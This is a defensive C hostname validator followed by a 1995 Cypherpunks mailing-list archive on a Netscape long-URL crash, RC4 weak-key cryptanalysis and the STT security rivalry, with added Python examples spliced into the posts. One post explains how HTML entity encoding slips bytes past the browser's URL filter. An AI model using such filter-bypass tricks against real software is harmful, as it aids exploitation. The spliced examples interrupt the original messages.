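 * at most 63 octets per label and 255 octets on the wire, which leaves
 * 253 printable characters for the dotted name. */
#define MAX_LABEL    63
#define MAX_HOSTNAME 253

enum host_status {
    HOST_OK = 0,
    HOST_EMPTY,
    HOST_TOO_LONG,
    HOST_LABEL_TOO_LONG,
    HOST_EMPTY_LABEL,
    HOST_BAD_CHAR
};

/* Validate a NUL-terminated name without copying it into a fixed buffer.
 * The length scan itself is bounded, so an unterminated or huge input is
 * reported as too long instead of being walked to its end. */
enum host_status hostname_check(const char *name)
{
    size_t len, i, label_len = 0;

    if (name == NULL || name[0] == '\0')
        return HOST_EMPTY;
    for (len = 0; len <= MAX_HOSTNAME; len++)
        if (name[len] == '\0')
            break;
    if (len > MAX_HOSTNAME)
        return HOST_TOO_LONG;
    if (len > 1 && name[len - 1] == '.')
        len--;                                /* one trailing dot is allowed */

    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (c == '.') {
            if (label_len == 0)
                return HOST_EMPTY_LABEL;      /* ".." or a leading "." */
            if (name[i - 1] == '-')
                return HOST_BAD_CHAR;         /* label may not end in '-' */
            label_len = 0;
            continue;
        }
        if (!(isalnum(c) || c == '-'))
            return HOST_BAD_CHAR;             /* rejects CR, LF, spaces, ... */
        if (label_len == 0 && c == '-')
            return HOST_BAD_CHAR;             /* label may not start with '-' */
        if (++label_len > MAX_LABEL)
            return HOST_LABEL_TOO_LONG;
    }
    if (label_len == 0)
        return HOST_EMPTY_LABEL;              /* name consisted only of dots */
    if (name[len - 1] == '-')
        return HOST_BAD_CHAR;
    return HOST_OK;
}

/* Resolve only names that passed the check, so a malformed or oversized
 * string never reaches the C library's resolver. NULL means "refused". */
struct hostent *safe_gethostbyname(const char *name)
{
    if (hostname_check(name) != HOST_OK)
        return NULL;
    return gethostbyname(name);
}

/* Constructed input: a name made of n copies of 'x' (n < 1024), mirroring
 * the "huge host name" experiments in the posts. */
enum host_status check_repeated_x(size_t n)
{
    static char buf[1024];
    if (n >= sizeof buf)
        n = sizeof buf - 1;
    memset(buf, 'x', n);
    buf[n] = '\0';
    return hostname_check(buf);
}

int main(int argc, char **argv)
{
    static const char *why[] = { "ok", "empty", "too long", "label too long",
                                 "empty label", "bad character" };
    const char *name = argc > 1 ? argv[1] : "localhost";
    printf("%s\n", why[hostname_check(name)]);
    return 0;
}
```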
From stewarts at ix.netcom.com Thu Sep 28 01:39:32 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 28 Sep 95 01:39:32 PDT
Subject: Another Netscape Bug (and possible security hole)
Message-ID: <199509280839.BAA02982@ix6.ix.netcom.com>

At 11:44 PM 9/27/95 -0400, Futplex wrote:
>However, a certain amount of common sense will go a long way in avoiding ugly
>incidents. To put it simply, "look before you leap". Before you click on a
>link, look at the status bar at the bottom of the Netscape window (in the
>Unix version at least) that displays the URL of the link under the pointer.

One of the later versions of the hack hid the large href inside the page as an IMG; the URL for the page looked mostly harmless (other than being named "bug2" or "hack2" :-); I think it was Ray's. Blowed up real good. "Push to test" ..... "Release to detonate"

>"What if you knew her, and found her dead on the ground ?
> How can you run when you know ?" -Neil Young

Well, Nixon's not coming any more, but this is it, we're on our own...

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From stewarts at ix.netcom.com Thu Sep 28 01:40:08 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Thu, 28 Sep 95 01:40:08 PDT
Subject: Looking for advice.
Message-ID: <199509280839.BAA03015@ix6.ix.netcom.com>

At 09:58 PM 9/27/95 -0700, you wrote:
>For two programs communicating via TCP/IP and exchanging authentication
>information, I want to make sure that the authentication info, (user's
>name and password,) doesn't pass in the clear. I can think of a few
>ways to handle this.
>
>1) Encrypt via shared key using symmetric encryption.
> This works but key management is a problem.
>2) Encrypt via public keys using public key encryption.
> There's licensing issues, and how do you generate public and private
> pairs for all of the programs? That could be a lot of primes!
>3) The "server" could keep user names and passwords stored as hashed values.
> That way the "client" could do a hash (MD5?) before sending it.
> This has the drawback of the server not having access to the unhashed
> values...if it needs that access this method won't work.

[Perry Metzger often has good comments about the order of doing things in.]

Are you planning to encrypt your sessions, or not? What threats are you worried about? What threats are you aware of but not worried about? How much opportunity do the users of the programs have to set up communications beforehand? Is this one-shot, or will a given client and server do a lot of repeat business? Are you concerned about privacy from machine to machine, or also from user to user? Are you worried about man-in-the-middle attacks? Are you worried about protecting the user's name, or only their password? Are you willing to buy hardware, or do you want software-only? How critical is setup speed? How slow are your processors? Are you worried about your TCP sessions getting hijacked once you've done the authentication?

For some applications, Diffie-Hellman is a good answer - the basic protocol doesn't do authentication, but does do secure key negotiation as long as you either don't have a man-in-the-middle or else have authentication such as digital signatures on your key-parts. Once you've created a shared key by DH, you can then use it to encrypt your session, or at least exchange passwords securely.

If you're willing to buy a bit of hardware, there are cryptographic smartcards that let you generate time-varying one-time passwords; some of them are decent.

Phil Karn's S/Key technology (ftp-able from and I think patented by Bellcore) takes a nice approach using hash functions - let h^n(m) denote message m cranked through hash function h n times, = h(h(h(...(h(m))...))), where h is a secure one-way hash like MD4 that's tolerably fast. To set up, calculate h^n(m), and store it in the server's password file.
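The hash-chain scheme this message sketches (store h^n(m) at set-up, then answer successive logins with h^(n-1)(m), h^(n-2)(m), and so on, the server hashing once and comparing) as an added example; it is not code from the post or from Bellcore's S/Key. It uses SHA-256 in place of the MD4 the post mentions, since MD4 is absent from many hashlib builds; the construction does not depend on which hash is used. The class and function names, the user name "alice" and the sample secret are this example's own.

```python
"""Hash-chain one-time passwords in the style of S/Key (added example)."""
import hashlib
import hmac
from typing import Dict, List, Optional, Tuple


def h(data: bytes) -> bytes:
    """The one-way hash h (SHA-256 stands in for the post's MD4)."""
    return hashlib.sha256(data).digest()


def h_n(m: bytes, n: int) -> bytes:
    """h^n(m): m cranked through h n times; h^0(m) is m itself."""
    for _ in range(n):
        m = h(m)
    return m


class SKeyServer:
    """Stores only (n, h^n(m)) per user, never the secret m."""

    def __init__(self) -> None:
        self.users: Dict[str, Tuple[int, bytes]] = {}

    def enroll(self, user: str, secret: bytes, n: int) -> None:
        self.users[user] = (n, h_n(secret, n))

    def challenge(self, user: str) -> int:
        """Tell the client which iteration count to answer with (n-1)."""
        n, _ = self.users[user]
        return n - 1

    def verify(self, user: str, response: bytes) -> bool:
        n, stored = self.users[user]
        if n <= 1:
            return False                        # chain used up: must re-enroll
        if not hmac.compare_digest(h(response), stored):
            return False                        # h(response) must equal h^n(m)
        self.users[user] = (n - 1, response)    # response is the new h^(n-1)(m)
        return True


class SKeyClient:
    def __init__(self, secret: bytes) -> None:
        self.secret = secret

    def respond(self, k: int) -> Optional[bytes]:
        """Answer challenge k with h^k(m); refuse k < 1, which would send m."""
        return None if k < 1 else h_n(self.secret, k)


def login_sequence(secret: bytes, n: int, attempts: int) -> List[str]:
    """Enroll with chain length n, then attempt `attempts` logins in a row."""
    srv, cli = SKeyServer(), SKeyClient(secret)
    srv.enroll("alice", secret, n)
    outcomes = []
    for _ in range(attempts):
        resp = cli.respond(srv.challenge("alice"))
        if resp is None:
            outcomes.append("exhausted")        # the n-1 usable passwords are gone
        else:
            outcomes.append("ok" if srv.verify("alice", resp) else "rejected")
    return outcomes


def replay_is_rejected(secret: bytes, n: int) -> bool:
    """A captured response cannot be reused: the server now expects h^(k-1)(m)."""
    srv, cli = SKeyServer(), SKeyClient(secret)
    srv.enroll("alice", secret, n)
    captured = cli.respond(srv.challenge("alice"))
    assert srv.verify("alice", captured)        # the legitimate login
    return not srv.verify("alice", captured)    # the same value a second time


if __name__ == "__main__":
    print(login_sequence(b"constructed sample secret", 5, 6))
    print("replay rejected:", replay_is_rejected(b"constructed sample secret", 3))
```

With n = 5 the chain yields exactly four logins before the client hits challenge 0 and refuses, which is the "reset after n-1 uses" in the post; an eavesdropper who sees h^(k)(m) on the wire cannot produce h^(k-1)(m) without inverting h.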
When you log in for the first time, the server tells you n-1, you calculate h^(n-1)(m), send it as your password, the server hashes it to get h^n(m), and compares it with the saved value. If it works, the server now saves h^(n-1)(m); the next time it'll ask you for n-2, you give it h^(n-2)(m), the server hashes to get h^(n-1)(m), etc. Obviously you've got to reset after n-1 uses.

If you have an environment where you can store secret keys safely on the server, you can use secret-key challenge-response methods effectively - the server sends a random number, and you send back the number, encrypted, or there are variants where you modify the number by 1, with or without timestamps, and maybe the server sends the number encrypted also. If you can't secure a general-use machine, but are able to secure a machine that just does authentication and keep it locked in a room with only network access and power, pretty soon you've invented Kerberos.

Do you need separate public keys for each application X user? Depending on what you're trying to authenticate, you could have a public key for the application or even just the machine it runs on, and send passwords encrypted with that; again there are variants with timestamps, random challenges, etc., to deal with issues like replay attacks. Or maybe you can have the server issue random numbers as challenges that you sign with your registered public key. If you do that, though, better have the server sign with _its_ public key also, since you'd probably rather not just go signing any random number anybody hands you. And what if there's a man in the middle there helping you log on...?

#---
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---

From perry at piermont.com Thu Sep 28 01:51:58 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Thu, 28 Sep 95 01:51:58 PDT
Subject: No Subject
In-Reply-To: <199509280611.HAA02214@utopia.hacktic.nl>
Message-ID: <199509280851.EAA20863@frankenstein.piermont.com>

Whoever you are, could you get this shit out of Cypherpunks? This list is about cryptography, not your ignorance of economics or how banking works.

Anonymous writes:
> that they do. 95% of all "cash" transactions in the U.S. are by check.
> Checks are thus effectively also currency. The banker creates the so-
> called "loan" by writing a check or deposit slip, not against actual
> money, but against your promise to pay back the loan. The only cost to the
> bank is the paper, ink, and a few dollars in salaries and office costs for
> each transaction. It is "check-kiting" on an enormous scale! The profits
> are enormous as shown below.
[...]

From frissell at panix.com Thu Sep 28 03:43:55 1995
From: frissell at panix.com (Duncan Frissell)
Date: Thu, 28 Sep 95 03:43:55 PDT
Subject: It's Wednesday
In-Reply-To: <44dcts$b36@tera.mcom.com>
Message-ID:

On 28 Sep 1995, Jeff Weinstein wrote:
> Sure. It's on ftp://ftp.netscape.com/pub/netscape. It has been there
> for several hours.

Late Wednesday. Of course whoever created the directories/files had his machine date set to *1994* so some of same are date stamped Tuesday September 27 1994.

DCF

From dl at hplyot.obspm.fr Thu Sep 28 03:51:10 1995
From: dl at hplyot.obspm.fr (Laurent Demailly)
Date: Thu, 28 Sep 95 03:51:10 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To:
Message-ID: <9509281050.AA15525@hplyot.obspm.fr>

Douglas Barnes writes:
> Spent too much time last night playing with the Netscape bug;
> among other things wrote some code to throw various random binary
> URLs at Netscape. Netscape seems prepared to swallow the bait
> as long as the URL does _not_ contain characters screened as
> follows:
> if ((c != '"') && (c!='>') && (c!=0) && (c!='/') ) {
> This means you can't plant 0x00, 0x22, 0x3e or 0x2f.
No, you *can* put 0x22, 0x3e and 0x2f by using respectively " > and / html constructs (&#nnn; nn decimal ascii code); unfortunately � is not recognized but you can probably use any number subtracted by itself or even short lda#0 (depending on the cpu),...if you need a zero,...(what for ?)

I hope this helps too, btw, anyone having contacts on the 8lgm folks? they must have experience with that kind of stuff...

Up-to-date info kept on http://hplyot.obspm.fr/~dl/netscapesec/

It seems the anim is working on about every netscape around, except one folk on linux that reported it didn't crash though someone else, on linux too said it crashed...

Even if a patch should be available now, making a demonstration is still interesting IMO [specially when you know that there are still ppl around using netscape 0.9x beta, and even ppl 'selling' it in ISP access packages!...]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|... Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept
Qaddafi ammunition radar Legion of Doom KGB Khaddafi Croatian

From jsw at netscape.com Thu Sep 28 03:52:26 1995
From: jsw at netscape.com (Jeff Weinstein)
Date: Thu, 28 Sep 95 03:52:26 PDT
Subject: It's Wednesday
In-Reply-To:
Message-ID: <9509280348.ZM151@tofuhut>

On Sep 28, 6:43am, Duncan Frissell wrote:
> Subject: Re: It's Wednesday
>
> On 28 Sep 1995, Jeff Weinstein wrote:
>
> > Sure. It's on ftp://ftp.netscape.com/pub/netscape. It has been there
> > for several hours.
>
> Late Wednesday. Of course whoever created the directories/files had his
> machine date set to *1994* so some of same are date stamped Tuesday
> September 27 1994.

They were put up some time between 4 and 6pm PST. As far as I can tell, all of the files are dated in 1995.

--Jeff
--
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw at netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
From neil at legless.demon.co.uk Wed Sep 27 20:24:06 1995
From: neil at legless.demon.co.uk (Neil Woods)
Date: Thu, 28 Sep 1995 04:24:06 +0100
Subject: Ray Cromwell: Another Netscape Bug (and possible security
In-Reply-To: <199509260045.OAA12377@hookomo.aloha.net> from "Timothy Newsham" at Sep 25, 95 02:45:26 pm
Message-ID: <199509280324.EAA19959@legless.demon.co.uk>

>
> > >On my BSDI2.0 machine running Netscape 1.1N, this causes a segmentation
> > >fault and subsequent coredump. GDB reports nothing useable (stripped
> > >executable)
> >
> > I cannot reproduce this bug on the following platforms:
> >
> > Solaris 2.5 beta/Netscape 1.1N
>
> I've reproduced it fine under sol2.4 1.1N. The page
> I tested from is http://www.aloha.net/~newsham/test.html.
> Simply click on the long test url and core dump.
> (You can view source before clicking to see what you
> are clicking on if you don't trust me :)
>
> > Howard Owen hbo at octel.com Octel Communications Corporation 1024/DC671C31 =
>

I've tried this url, it does indeed core dump. Just had a quick look at the core. From first impressions, it's a global overwrite. Therefore we're not overwriting a flushed stack frame, so a syslog(3) style exploit is impossible. Global overwrites can be exploited, but due to the scenario we're looking at, I'd consider exploit chances to be very low indeed.

Cheers,
Neil
--
Let the Mystery Be, So Watcha Want, Longing In Their Hearts, Hate My Way, M-Bike, Safari, Uncle June and Aunt Kiyoti, Daisy Dead Petals, Tuff Gnarl.
...like a badger with an afro throwing sparklers at the Pope...
--
sameer Voice: 510-601-9777
Community ConneXion FAX: 510-601-9734
An Internet Privacy Provider Dialin: 510-658-6376
http://www.c2.org (or login as "guest") sameer at c2.org

From jya at pipeline.com Thu Sep 28 05:08:27 1995
From: jya at pipeline.com (John Young)
Date: Thu, 28 Sep 95 05:08:27 PDT
Subject: STT_???
Message-ID: <199509281208.IAA06190@pipe4.nyc.pipeline.com>

9-28-95.
W$Japer: "Infighting Unravels Alliance Seeking Standard to Protect Internet Purchases."

The consortium brought together such top players as credit-card rivals Visa International and MasterCard International Inc., software titan Microsoft Corp. and Internet upstart Netscape Communications Corp. But this week, the alliance split because of tensions between Visa and MasterCard and their respective technology partners -- Microsoft and Netscape.

Regarding Netscape, Mr. Dent of Microsoft said the firm's security deficiencies that have recently come to light have "tainted" electronic commerce on the Internet. Mr. Dent also noted that Microsoft yesterday introduced new security technology, including means to verify a user's identity, that is much stronger than Netscape's.

STT_??? (6 kb)

From jeffb at sware.com Thu Sep 28 05:33:31 1995
From: jeffb at sware.com (Jeff Barber)
Date: Thu, 28 Sep 95 05:33:31 PDT
Subject: Hack Microsoft NT C2 Rating?
In-Reply-To: <9509272102.AA21900@zorch.w3.org>
Message-ID: <9509281232.AA02546@wombat.sware.com>

hallam at w3.org writes:
> I think that c2 is possibly the limit of orange/red bookishness that is
> reasonable to work to. It is not a trivial level of security however, UNIX
> despite all the claims has never been shipped as C2 secure as standard by a
> mainstream vendor. Even requirements involving trivial effort but which are
> extremely important such as the writing of a users security guide have never
> been taken seriously on any of the UNIX platforms on which I have worked.

A slight correction: SCO shipped the C2 version of their Open Desktop 1.1 as the standard (in fact, only) version a few years back. The howls of outrage from their customer base (due to the non-standard-Unix behavior) caused them to back off in the next major release. Last time I tried to install their software, C2 had been made an option. (Of course, AFAIK, they never actually completed a C2 evaluation.)
--
Jeff

From adam at bwh.harvard.edu Thu Sep 28 06:09:58 1995
From: adam at bwh.harvard.edu (Adam Shostack)
Date: Thu, 28 Sep 95 06:09:58 PDT
Subject: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
Message-ID: <199509281309.JAA12017@bwh.harvard.edu>

This came across the SSL mailing list. Anyone know Taher's position on key-escrow?

| From ssl-talk-request at netscape.com Thu Sep 28 01:54:10 1995
| Resent-Date: Tue, 26 Sep 1995 09:34:09 -0700
| Date: Tue, 26 Sep 1995 09:30:03 -0700
| Message-Id: <199509261630.JAA06021 at neon.netscape.com>
| X-Sender: elgamal at pop.mcom.com
| X-Mailer: Windows Eudora Version 2.0.3
| Mime-Version: 1.0
| Content-Type: text/plain; charset="us-ascii"
| To: John Droge , ssl-talk at netscape.com
| From: elgamal at netscape.com (Taher ElGamal)
| Subject: Re: Crypto
| Resent-Message-ID: <"BFRph1.0.yW1.jg2Qm"@neon>
| Resent-From: ssl-talk at netscape.com
| X-Mailing-List: archive/latest/987
| X-Loop: ssl-talk at netscape.com
| Precedence: list
| Resent-Sender: ssl-talk-request at netscape.com
|
| Can I get some detailed info about your company and products-- We are
| thinking about this.
|
| taher
|
| At 11:34 PM 9/25/95 -0700, John Droge wrote:
| >Dear Sirs:
| >
| >My company developed and currently produces the Fortezza Crypto
| >Card for the Government. What plans do you have to support this
| >standard?
| >
| >Sincerely,
| >John Droge
| >Vice President
| >Program Development
| >Mykotronx, Inc.
| >357 Van Ness Way, Ste. 200
| >Torrance, CA 90501
| >(310) 533-8100
| >
| Taher Elgamal elgamal at netscape.com
| Chief Scientist
| Netscape Comm Corp., 501 E Middlefield Road, Mountain View Ca 94043.
| (415) 528 2898 (Tel), (415) 528 4122 (Fax)
|

From jya at pipeline.com Thu Sep 28 06:15:39 1995
From: jya at pipeline.com (John Young)
Date: Thu, 28 Sep 95 06:15:39 PDT
Subject: 25 Crays a Year to Break STT
Message-ID: <199509281315.JAA11395@pipe4.nyc.pipeline.com>

Financial Times, September 28, 1995, p.1.
Rivalry for Internet Security Grows
By Louise Kehoe in San Francisco

The Internet rivalry between Microsoft, the world's largest software company, and Netscape Communications increased yesterday when they announced competing encryption technology intended to ensure the security of financial transactions over the global computer network.

Mr James Clark chairman of Netscape, the leading supplier of browser software that enables personal computer users to "surf" the Internet, also revealed the company had turned down a move by Microsoft to take a minority stake in Netscape earlier this year, before Netscape's public offering.

Microsoft's encryption technology, developed with Visa International the credit card processing organisation, is intended to solve Internet security problems which have become a serious barrier to electronic commerce. Recent incidents, including the hacking of supposedly secure Internet software developed by Netscape, have heightened concerns about sending sensitive data such as credit card numbers over the Internet.

Microsoft said its Secure Transaction Technology (STT), was designed to provide a much higher level of security for credit card transactions on the Internet. Netscape's general purpose encryption system uses a 40 or 128-bit electronic "key", while STT will use 2,000-bit keys.

"By Christmas of 1996 you will be able to shop on the Internet to your heart's content, without even thinking about security," said Mr Warren Dent, Microsoft director of business development for consumer systems. Although no encryption system was totally secure, Mr Dent estimated it would take "25 Cray supercomputers a year" to break the STT codes.

Netscape, however, said a new version of its Navigator software, which will become available next week will provide the same level of security. Netscape's "Secure Courier" technology has been developed in conjunction with MasterCard, Visa's credit card rival.
To encourage widespread adoption of STT, Microsoft and Visa are making its technical specifications available at no charge to third parties to allow them to develop software. Netscape said Microsoft is expecting to charge transaction fees each time the STT technology is used.

Commercial software products incorporating STT are expected to be available by April, Microsoft said. Netscape says Secure Courier will be available sooner.

[End]

From andrewr at vironix.co.za Thu Sep 28 07:28:45 1995
From: andrewr at vironix.co.za (Andrew Roos)
Date: Thu, 28 Sep 95 07:28:45 PDT
Subject: Cryptanalysis of RC4 - Preliminary Results
Message-ID: <9509281628.aa25754@herman.vironix.co.za>

-----BEGIN PGP SIGNED MESSAGE-----

Hi c'punks & sci.cryptites

About a week ago I posted a message about weak keys in RC4. This is an update on the results of my continued 4am sessions with RC4 and shows that certain weak keys lead to an almost-feasible known plaintext attack on the cipher (well, about as feasible as the differential attack on DES, shall we say).

The attack is based on two particularly interesting three-byte key prefixes which have a high probability of producing PRNG sequences which start with a known two-byte sequence. The prefixes are:

1. Keys starting with "00 00 FD" which have a 14% probability of generating sequences which start "00 00".

2. Keys starting with "03 FD FC" which have a 5% probability of generating sequences which start "FF 03".

Note that the expected frequency of any two-byte output sequence is 1 in 65536 or about 0.0015%, so these key prefixes are highly unusual. I won't go into the reasons why in this post, since it follows the same reasoning as my last post, but these prefixes are special in that they have a high probability of initializing the RC4 state table in such a way that the first two generated bytes depend only on the first three entries in the state table.
This observation is the basis for a simple known-plaintext attack which reduces the effective key space which you need to search to have a 50% probability of discovering a key by about 11.2 bits. The down side is that you need "quite a few" known plaintexts to make the attack feasible. It works as follows:

1. Collect a large number of known plaintexts (and hence known generator sequences).
2. Discard generator sequences which do not start with "00 00" or "FF 03".
3. For generator streams starting "00 00", search all keys which begin with "00 00 FD".
4. For generator streams starting "FF 03", search all keys which begin with "03 FD FC".
5. Keep going until you find a key :-)

Clearly this attack will only discover a small fraction of the keys. However since most generator sequences are discarded without being searched, and for those which are searched the search is 2^24 smaller than would be required to search the entire keyspace, the number of trials required to determine a key is significantly lower than for brute force alone.

Enough of an intro, here are the relevant results. Forgive my simplistic approach to maths, I'm a philosopher-cum-software developer, not a mathematician.

I've run the relevant simulations with 40-bit, 64-bit, 80-bit and 128-bit key lengths, and with two different PRNGs. For the sake of consistency with my earlier paper I'll use the figures gathered for 80-bit keys (this seems to be RSA's preferred key length for RC4), but there are no significant differences for other key lengths. The PRNG used for these tests was L'Ecuyer's 32-bit combined linear congruential generator as described in "Applied Cryptography" p. 349.

(a) Out of one million trials, keys starting with "00 00 FD" generated sequences starting "00 00" 138217 times, and keys starting with "03 FD FC" generated output sequences starting "FF 03" 50490 times.
(b) Out of ten million trials, arbitrary pseudo-random keys generated sequences starting with "00 00" 446 times, and sequences starting with "FF 03" 146 times. (Note the abnormally high incidence of "00 00"; the expected mean is 152.8).

Suppose we have the output stream generated by a randomly chosen key. The chance that it will start with either "00 00" or "FF 03", and that we will therefore search it, is:

  (446 + 146) / 1e7 = 5.92e-5

The chance that it starts with "00 00" and was generated by a key starting with "00 00 FD", or that it starts with "FF 03" and was generated by a key starting "03 FD FC" - i.e. the chance that we will search it and be rewarded for our efforts - is:

  (138217 + 50490)/(1e6 * 2^24) = 1.12e-8

The total number of plaintexts required for a 50% chance that we will discover one of the keys is:

  log(0.5)/log(1 - 1.12e-8) = 61 900 000

Well I did say "quite a few" plaintexts would be necessary :-)

And the number of plaintexts which you expect to search in order to find the "right" one is:

  61 900 000 * 5.92e-5 = 3665

Since the total key length is 80 bits, and we are "guessing" 24 of these, each search requires 2^56 trials. Hence the total number of trials for a 50% chance of discovering a key is:

  3665 * 2^56 = 2.64e20 = 2 ^ 67.8

Since brute search alone would require 2^79 trials for a 50% chance of determining the key, this reduces the number of trials by 2^11.2.

The results are essentially identical for all the key lengths I have tried, and in each case reduce effective key length by about 11.2 bits. So, for example, a 64-bit key would normally require 2^63 trials for 50% chance of solution; this attack reduces the number of trials to 2^51.8 at the cost of requiring 62 million known plaintexts.

I'm still running simulations to check my maths, and although initial results are encouraging, I don't have enough data for it to be statistically relevant yet (generating all these sets of 62 million known streams takes time...)
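The two claims in this post, the weak-key prefixes and the work-factor arithmetic built on them, can both be checked independently. The block below is an added example, not code from the post: it implements textbook RC4 (key scheduling plus the output generator), measures how often keys beginning with "00 00 FD" and "03 FD FC" produce the predicted first two keystream bytes, and redoes the post's 50%-success arithmetic from the probabilities it quotes. The trial counts, the fixed seed, and the 10-byte (80-bit) key length are this example's own choices; the post's figures came from a different generator and a million trials, so the measured rates will agree with its 14% and 5% only approximately.

```python
"""RC4 weak-key prefixes: reproduce the bias and the work-factor arithmetic.

Added example, not code from the post.  Trial counts, seed and key length
are this example's assumptions.
"""
import math
import random


def rc4_ksa(key: bytes) -> list:
    """Key scheduling: permute S[0..255] under the (repeating) key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_keystream(key: bytes, n: int) -> bytes:
    """First n keystream bytes for `key` (the output generator)."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def prefix_hit_rate(prefix: bytes, expected: bytes, key_len: int = 10,
                    trials: int = 10000, seed: int = 1) -> float:
    """Fraction of random keys that start with `prefix` whose keystream
    starts with `expected`.  With prefix=b"" this is the baseline rate
    for arbitrary keys, which the post puts at about 1 in 65536."""
    rng = random.Random(seed)
    hits = 0
    for _ in range(trials):
        tail = bytes(rng.getrandbits(8) for _ in range(key_len - len(prefix)))
        if rc4_keystream(prefix + tail, len(expected)) == expected:
            hits += 1
    return hits / trials


def attack_work_factor(key_bits: int = 80, p_search: float = 5.92e-5,
                       p_hit: float = 1.12e-8) -> dict:
    """The post's arithmetic.  p_search: P(stream starts 00 00 or FF 03);
    p_hit: P(it does so AND the key carries the matching weak prefix)."""
    plaintexts = math.log(0.5) / math.log(1 - p_hit)   # for a 50% chance of one hit
    searched = plaintexts * p_search                    # streams actually searched
    trials = searched * 2 ** (key_bits - 24)            # 24 key bits are "guessed"
    brute_force = 2 ** (key_bits - 1)                   # 50% chance by brute force
    return {
        "plaintexts": plaintexts,
        "searched": searched,
        "log2_trials": math.log2(trials),
        "bits_saved": math.log2(brute_force) - math.log2(trials),
    }


if __name__ == "__main__":
    for prefix, expected in ((b"\x00\x00\xfd", b"\x00\x00"),
                             (b"\x03\xfd\xfc", b"\xff\x03"),
                             (b"", b"\x00\x00")):
        print(prefix.hex() or "(none)", expected.hex(),
              prefix_hit_rate(prefix, expected))
    print(attack_work_factor())
```

Why the bias exists follows from the key-scheduling loop: with key bytes 00 00 FD the first three steps leave S[1] = 1 and S[2] = 0, and the first two output bytes are then 00 00 unless one of the remaining 253 swaps happens to land on index 1 or 2, which is roughly (1 - 2/256)^253, about 14%. The same reading of the 03 FD FC case gives S[0] = 3, S[1] = 1, S[2] = 255 and three indices to avoid, about 5%.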
So consider this preliminary (again), and I'll post the results of my simulations when I have enough data.

Andrew
________________________________________________________________
Andrew Roos // C++ programmers have class (but not much inheritance)
PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGrlfmatuqa4OR+lAQF1eQP+IBBmSztAYUpq1q/BjzvYDCbb+Ns0Gi1S
u9wTaZOCl32fdp7NSUEQBX39nVJkQZginug56BZXzijRvOx6fl4+z7dmW9jwtE5E
YNCOhx+/fHX4psszMyEUTrnza7MYDc4HXlgv743LOD/xvEyU0D5OGgB5fg+lyhAK
6xQ/Zy8JpE8=
=BdMn
-----END PGP SIGNATURE-----

From rah at shipwright.com Thu Sep 28 07:53:17 1995
From: rah at shipwright.com (Robert Hettinga)
Date: Thu, 28 Sep 95 07:53:17 PDT
Subject: 2nd notice - IEEE Symp on Security and Privacy - Call for papers
Message-ID:

--- begin forwarded text

From: zurko at osf.org (Mary Ellen Zurko)
Subject: 2nd notice - IEEE Symp on Security and Privacy - Call for papers
To: www-buyinfo at allegra.att.com
Date: Thu, 28 Sep 95 9:59:45 EDT
Cc: zurko at osf.org (Mez)
Mailer: Elm [revision: 70.85]

CALL FOR PAPERS

1996 IEEE Symposium on Security and Privacy
May 6-8, 1996
Oakland, California

sponsored by IEEE Computer Society Technical Committee on Security and Privacy
in cooperation with The International Association for Cryptologic Research (IACR)

Since 1980, the Symposium on Security and Privacy has been the premier forum for presenting developments in computer security and for bringing together researchers and practitioners in the field. This year, we seek to build upon this tradition of excellence by re-emphasizing work on engineering and applications as well as theoretical advances. We also seek to broaden the scope of the Symposium by introducing additional topics.
We want to hear not only about new theoretical results, but also about work in the design and implementation of secure systems and work on policy relating to system security. We are particularly interested in papers on policy and technical issues relating to privacy in the context of the Information Infrastructure, papers on securing unsecure applications and operating systems, papers that relate software and system engineering technology to the design of secure systems, and papers on hardware and architectural support for secure systems.

The symposium will focus on technical aspects of security and privacy as they arise in commercial and industrial applications, as well as in government and military systems. It will address advances in the theory, design, implementation, analysis, and application of secure computer systems, and in the integration and reconciliation of security and privacy with other critical system properties such as reliability, performance, and safety.

Topics in which papers and panel session proposals are invited include, but are not limited to, the following:

  Secure systems
  Privacy Issues
  Access controls
  Security verification
  Network security
  Policy modeling
  Information flow
  Authentication
  Database security
  Data integrity
  Security Protocols
  Viruses and worms
  Auditing
  Biometrics
  Smartcards
  Commercial and industrial security
  Intrusion Detection
  Security and other critical system properties
  Distributed systems security
  Novel applications of cryptography and other security techniques

We will continue the session of very brief (5-minute) talks introduced last year. Our goal is to make it possible for us to hear from people who are advancing the field in the areas of system design and implementation, and who would like to present their ideas to the symposium audience but may lack the time and resources needed to prepare a full paper. Submissions for this session will be accepted up to April 2, 1996 to permit us to hear of the most recent developments.
Abstracts of these talks will be distributed at the conference.

INSTRUCTIONS TO AUTHORS:

